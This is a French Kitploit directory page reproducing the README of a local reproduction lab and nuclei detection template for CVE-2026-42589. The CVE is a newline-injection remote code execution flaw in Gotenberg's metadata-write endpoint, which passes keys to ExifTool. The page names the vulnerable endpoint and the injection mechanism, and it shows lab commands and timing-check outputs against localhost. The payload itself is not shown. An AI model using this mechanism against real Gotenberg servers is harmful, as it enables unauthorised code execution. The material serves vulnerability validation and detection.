Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC_CVE-2026-42589 — POC_CVE-2026-42589 | Kitploit
Outils/GitHubGitHub/fineman999/poc_cve-2026-42589
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubfineman999/poc_cve-2026-42589

POC_CVE-2026-42589

POC_CVE-2026-42589

Voir le dépôt
13il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC_CVE-2026-42589

Laboratoire de reproduction local et ébauche de template nuclei pour CVE-2026-42589 affectant Gotenberg.

Résumé

CVE-2026-42589 est un problème d'exécution de code à distance non authentifié dans Gotenberg causé par une injection de saut de ligne dans les clés de métadonnées dans :

root@kitploit:~
POST /forms/pdfengines/metadata/write

Les versions affectées de Gotenberg transmettent les clés de métadonnées contrôlées par l'utilisateur à ExifTool sans rejeter les caractères de contrôle. Une clé de métadonnées contenant des sauts de ligne échappés en JSON peut être divisée en arguments supplémentaires d'ExifTool.

Ce laboratoire a été utilisé pour valider :

  • le comportement vulnérable sur gotenberg/gotenberg:8.29.1
  • le comportement corrigé sur gotenberg/gotenberg:8.31.0

Le template nuclei utilise uniquement une vérification temporelle non destructive avec sleep 6.

Références

  • Avis GitHub : https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
Télécharger l’outil
  • Version corrigée : https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
  • Documentation ExifTool : https://exiftool.org/exiftool_pod.html
  • Fichiers

    • docker-compose.yml
    • docker-compose.latest.yml
    • CVE-2026-42589.yaml
    • manual_verify.py
    • sample.pdf
    • README.md

    Test de vulnérabilité

    Démarrer Gotenberg 8.29.1 :

    root@kitploit:~
    docker compose down -v
    docker compose up -d
    docker compose logs --tail=100 gotenberg
    

    Vérifier la version :

    root@kitploit:~
    curl -s http://127.0.0.1:3000/version
    

    Vérification manuelle du timing multipart brut :

    root@kitploit:~
    python3 manual_verify.py http://127.0.0.1:3000
    

    Signal vulnérable attendu :

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    TOTAL_TIME=6.xs
    

    Résultat vulnérable observé :

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    TOTAL_TIME=6.300s
    Internal Server Error
    

    Contrôle de version corrigée

    Démarrer Gotenberg 8.31.0 :

    root@kitploit:~
    docker compose -f docker-compose.latest.yml down -v
    docker compose -f docker-compose.latest.yml up -d
    docker compose -f docker-compose.latest.yml logs --tail=100 gotenberg
    

    Vérifier la version :

    root@kitploit:~
    curl -s http://127.0.0.1:3000/version
    

    Exécuter la même vérification temporelle manuelle :

    root@kitploit:~
    python3 manual_verify.py http://127.0.0.1:3000
    

    Résultat de la version corrigée observé :

    root@kitploit:~
    HTTP/1.1 400 Bad Request
    TOTAL_TIME=0.145s
    At least one PDF engine cannot process the requested metadata, while others may have failed to convert due to different issues
    

    Nuclei

    Valider le template :

    root@kitploit:~
    nuclei -duc -validate -t CVE-2026-42589.yaml
    

    Exécuter contre la cible vulnérable :

    root@kitploit:~
    nuclei -duc -u http://127.0.0.1:3000 -t CVE-2026-42589.yaml
    

    Comportement attendu :

    • 8.29.1 : correspondance après la réponse 500 retardée
    • 8.31.0 : aucune correspondance

    Résultat vulnérable observé :

    root@kitploit:~
    [CVE-2026-42589] [http] [critical] http://127.0.0.1:3000/forms/pdfengines/metadata/write
    [INF] Scan completed in 6.245907708s. 1 matches found.
    

    Résultat de la version corrigée observé :

    root@kitploit:~
    [INF] Scan completed in 93.01425ms. No results found.
    

    Remarques

    • Ce laboratoire évite intentionnellement les écritures de fichiers, les shells inversés et les rappels hors bande.
    • Le template détecte le comportement, pas uniquement une bannière de version.
    • Aucune cible réelle n'a été utilisée.
    • À utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous êtes explicitement autorisé à tester.